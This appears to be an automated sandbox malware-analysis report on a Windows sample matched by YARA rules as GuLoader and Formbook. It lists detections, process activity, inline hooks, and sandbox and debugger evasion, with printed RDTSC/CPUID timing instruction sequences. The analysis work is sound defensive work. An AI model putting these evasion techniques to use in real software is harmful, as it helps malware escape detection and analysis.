Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000024.00000002.1042381038.0000000000060000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@6/1

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

File created: C:\Users\user\AppData\Local\Temp\~DFF8A59228C9DEEDCA.TMP

Jump to behavior

Source: ZGNX11JMSc.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: ZGNX11JMSc.exe

Virustotal: Detection: 20%

Source: unknown	Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process created: C:\Users\user\Desktop\ZGNX11JMSc.exe 'C:\Users\user\Desktop\ZGNX11JMSc.exe'

Source: ZGNX11JMSc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: netstat.pdbGCTL source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source:	Binary string: netstat.pdb source: ZGNX11JMSc.exe, 00000024.00000003.1041284039.0000000000A58000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: ZGNX11JMSc.exe, 00000024.00000002.1048163880.000000001E120000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ZGNX11JMSc.exe
Source:	Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ANTISOCIA.pdb source: ZGNX11JMSc.exe

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match

File source: 00000001.00000002.623756181.0000000002240000.00000040.00000001.sdmp, type: MEMORY

Yara detected GuLoader

Show sources

Source: Yara match	File source: ZGNX11JMSc.exe, type: SAMPLE
Source: Yara match	File source: 1.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.0.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.ZGNX11JMSc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.621430446.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.213217103.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.623260641.0000000000401000.00000020.00020000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0040495E push es; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02061774 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02064205 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02062A05 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02061205 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02065A03 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02066214 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02064A13 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02063213 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02061A13 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02060218 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02063A24 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02062224 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02060A24 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02066A24 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02065225 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02064233 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02062A33 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02061233 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02065A33 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02064A44 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02063244 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02061A44 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02066244 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02060248 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02063A54 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02062254 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02066A54 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02065253 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02060A58 push edx; ret
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02065A64 push edx; ret

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEE

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408FD TerminateProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022468CC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022442CD NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B1A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241B5F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022443F1 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247036 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02244071 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240845 TerminateProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408B3 TerminateProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022408E2 TerminateProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224790A
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02242958 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02241E2C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224767B
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02246F9E
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02240C24 TerminateProcess,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224742D
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224341B NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224251E NtWriteVirtualMemory,

Detected RDTSC dummy instruction sequence (likely for instruction hammering)

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc

Tries to detect Any.run

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	File opened: C:\Program Files\qga\qga.exe

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000022401BE second address: 00000000022401BE instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000022470C1 second address: 00000000022470D5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add edx, ecx 0x0000000c neg ecx 0x0000000e pushad 0x0000000f mov edx, 000000D8h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248DB2 second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c test dl, dl 0x0000000e add eax, 00003004h 0x00000013 mov dword ptr [edi+00003000h], eax 0x00000019 test eax, eax 0x0000001b mov ecx, 07CEBD8Ah 0x00000020 cmp ax, 0000BB7Bh 0x00000024 sub ecx, 04255BC2h 0x0000002a xor ecx, 17A2670Fh 0x00000030 cmp al, bl 0x00000032 sub ecx, 140B05FBh 0x00000038 test eax, ebx 0x0000003a test edx, ebx 0x0000003c mov byte ptr [eax+ecx], 00000000h 0x00000040 dec ecx 0x00000041 mov dword ptr [ebp+0000025Ch], edi 0x00000047 mov edi, 4BBAF831h 0x0000004c pushad 0x0000004d rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248DFF second address: 0000000002248DFF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a test dl, dl 0x0000000c xor edi, 940AC00Fh 0x00000012 test eax, eax 0x00000014 xor edi, A987D7D4h 0x0000001a cmp ax, 0000BFCEh 0x0000001e sub edi, 7637EFEAh 0x00000024 cmp al, bl 0x00000026 cmp ecx, edi 0x00000028 mov edi, dword ptr [ebp+0000025Ch] 0x0000002e jnl 00007FA2E4BBF2EFh 0x00000030 test edx, ebx 0x00000032 mov byte ptr [eax+ecx], 00000000h 0x00000036 dec ecx 0x00000037 mov dword ptr [ebp+0000025Ch], edi 0x0000003d mov edi, 4BBAF831h 0x00000042 pushad 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002247A0D second address: 0000000002247A0D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000022475BB second address: 00000000022475BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E4BBF35Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E4BBF90Eh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E4BBF45Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002247D7F second address: 0000000002247D7F instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002248035 second address: 0000000002248035 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002240ADA second address: 0000000002240ADA instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002240DB2 second address: 0000000002240DB2 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000002241092 second address: 0000000002241092 instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 000000000224110D second address: 000000000224110D instructions:
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000005675BB second address: 00000000005675BB instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 52600CA0h 0x00000013 xor eax, 275578A5h 0x00000018 xor eax, AF7E784Ah 0x0000001d xor eax, DA4B0C4Eh 0x00000022 cpuid 0x00000024 jmp 00007FA2E439A94Eh 0x00000026 test dl, dl 0x00000028 bt ecx, 1Fh 0x0000002c test dx, ax 0x0000002f jc 00007FA2E439AEFEh 0x00000035 test bx, bx 0x00000038 test eax, ebx 0x0000003a popad 0x0000003b call 00007FA2E439AA4Ah 0x00000040 lfence 0x00000043 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000000566FB5 second address: 0000000000567020 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov ebx, 9A3693F5h 0x00000008 cmp cx, cx 0x0000000b sub ebx, C476974Ah 0x00000011 test ax, 00008AFBh 0x00000015 sub ebx, E4232D93h 0x0000001b add ebx, 0E643128h 0x00000021 mov bx, word ptr [edx+ebx] 0x00000025 mov ax, word ptr [eax] 0x00000028 cmp dl, FFFFFFB4h 0x0000002b xor ax, cx 0x0000002e cmp bx, cx 0x00000031 xor bx, ax 0x00000034 mov word ptr [ebp+00000275h], di 0x0000003b mov di, 3896h 0x0000003f xor di, 7DA2h 0x00000044 test dx, ax 0x00000047 xor di, 97D1h 0x0000004c cmp cx, cx 0x0000004f xor di, 88A8h 0x00000054 pushad 0x00000055 mov si, 5497h 0x00000059 cmp si, 5497h 0x0000005e jne 00007FA2E4BBEECAh 0x00000064 popad 0x00000065 pushad 0x00000066 mov edx, 000000DBh 0x0000006b rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000000567020 second address: 0000000000566FB5 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp bx, di 0x00000006 mov di, word ptr [ebp+00000275h] 0x0000000d je 00007FA2E439A936h 0x0000000f inc cx 0x00000011 jmp 00007FA2E439A899h 0x00000016 test al, A3h 0x00000018 mov eax, dword ptr [ebp+64h] 0x0000001b pushad 0x0000001c mov edx, 00000063h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000000567062 second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x00000014 pushad 0x00000015 mov edx, 0000008Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 000000000056707C second address: 000000000056707C instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [ebp+0000019Dh], 293F2C89h 0x0000000d sub dword ptr [ebp+0000019Dh], E4024E33h 0x00000017 pushad 0x00000018 mov bh, 30h 0x0000001a cmp bh, 00000030h 0x0000001d jne 00007FA2E4397793h 0x00000023 popad 0x00000024 cmp ebx, dword ptr [ebp+0000019Dh] 0x0000002a jnl 00007FA2E439A929h 0x0000002c add ebx, 02h 0x0000002f jmp 00007FA2E439A8BFh 0x00000031 test bh, 0000005Ch 0x00000034 xor word ptr [eax+ebx], cx 0x00000038 test dl, FFFFFF99h 0x0000003b mov dword ptr [ebp+0000019Dh], CA26A2BDh 0x00000045 test bx, ax 0x00000048 pushad 0x00000049 nop 0x0000004a nop 0x0000004b mov eax, 00000001h 0x00000050 cpuid 0x00000052 popad 0x00000053 add dword ptr [ebp+0000019Dh], 431ADB4Eh 0x0000005d pushad 0x0000005e mov edx, 0000008Fh 0x00000063 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Code function: 1_2_022408FD rdtsc

Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: ZGNX11JMSc.exe, 00000024.00000002.1042829626.00000000009F8000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW
Source: ZGNX11JMSc.exe, 00000024.00000003.1031145557.0000000000A43000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW,
Source: ZGNX11JMSc.exe, 00000001.00000002.623763596.0000000002250000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Process information queried: ProcessInformation

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Thread information set: HideFromDebugger

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Code function: 1_2_022408FD rdtsc

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe

Code function: 36_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,

Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02246B93 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022450CA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02242958 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_022471A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_0224341B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 1_2_02247D52 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E163A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E17A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E178E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E158A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1FFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E14E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E218A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1D4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E149240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E157E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E18927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E16AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E15766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ZGNX11JMSc.exe	Code function: 36_2_1E1FB260 mov eax, dword ptr fs:[00000030h]
